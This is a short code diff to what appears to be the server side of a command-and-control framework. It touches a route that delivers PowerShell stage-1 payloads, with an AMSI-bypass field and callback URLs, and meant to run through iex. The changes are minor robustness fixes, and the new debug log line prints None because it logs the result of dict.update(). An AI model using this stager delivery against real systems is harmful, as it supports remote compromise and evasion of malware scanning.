@@ -77,6 +77,8 @@ def get_profile():
     try:
         with open(os.path.join(directories.XDG_DATA_HOME, "profile.ps1"), "r") as f:
             profile = f.read()
+    except FileNotFoundError:
+        profile = ""
     except Exception as e:
         log.error("Error while reading profile.ps1: %s" % str(e))
         profile = ""
@@ -134,6 +136,7 @@ def stager():
         separator = ''
 
     stager_context = dict(
+        VERSION=__version__,
         key=key,
         amsibypass=amsi_bypass,
         callback=hidden_app.callback_urls[transport],
@@ -163,7 +166,13 @@ def stager():
     else:
         result = result.replace(separator, '')
 
-    log.debug("Delivering stage 1; context: %s" % stager_context)
+    # Ensure result is non-empty, cause `""|iex` throws an error
+    if not result:
+        log.error("Stage1 or parts thereof failed to load")
+        result = " "
+
+    log.debug("Delivering stage 1; context: %s" %
+              stager_context.update(stage2='...', stage3='...'))
 
     return Response(result, content_type='text/plain; charset=utf-8')
 
